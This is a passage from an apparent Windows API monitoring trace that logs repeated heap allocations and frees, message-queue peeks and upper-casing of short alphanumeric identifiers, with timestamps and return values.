wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.144] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.146] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.146] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0209.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.150] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0209.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0209.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.152] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0209.152] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0209.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c08 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.153] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c08 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0209.154] RtlAllocateHeap 